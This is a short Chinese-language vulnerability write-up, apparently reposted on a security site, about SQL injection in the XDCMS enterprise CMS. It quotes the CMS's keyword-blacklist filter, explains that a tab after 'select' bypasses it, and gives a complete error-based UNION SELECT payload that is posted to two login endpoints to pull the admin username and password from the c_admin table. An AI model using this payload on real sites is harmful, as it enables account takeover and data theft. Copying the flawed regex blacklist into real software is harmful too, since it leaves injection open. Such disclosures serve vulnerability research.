XDCMS企业管理系统SQL #1~2

没穿底裤 2020年1月1日04:55:05评论411 views字数 689阅读2分17秒阅读模式
摘要

看到这个函数。[php]
function safe_html($str){if(empty($str)){return;}if (preg_match('//b select/b |/b insert/b | /b update/b | /b and/b | /b in/b | /b on/b | /b left/b |/b joins/b | /b delete/b |/%|/=|///*|/*| /b union/b |/././/|/.//| /b from/b | /b where/b | /b group/b | /binto/b |/bload_file/b


漏洞作者: roker

看到这个函数。

[php]
function safe_html($str){

if(empty($str)){return;}

if (preg_match('//b select/b |/b insert/b | /b update/b | /b and/b | /b in/b | /b on/b | /b left/b |/b joins/b | /b delete/b |/%|/=|///*|/*| /b union/b |/././/|/.//| /b from/b | /b where/b | /b group/b | /binto/b |/bload_file/b

|/boutfile/b/i',$str)){showmsg(C('error'),'-1');}

return htmlspecialchars($str, ENT_COMPAT ,'GB2312');

}
[/php]

select+tab键 就可以了嘛~
第一处

url: xxx.xxx/index.php?m=member&f=login_save

post 如下数据

[php]

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM c_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b#

[/php]

XDCMS企业管理系统SQL #1~2

 

注入到管理账号密码

第二处 index.php?m=xdcms&c=login&f=check

同第一处所示。

一样的exp。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日04:55:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XDCMS企业管理系统SQL #1~2https://cn-sec.com/archives/75663.html

发表评论

匿名网友 填写信息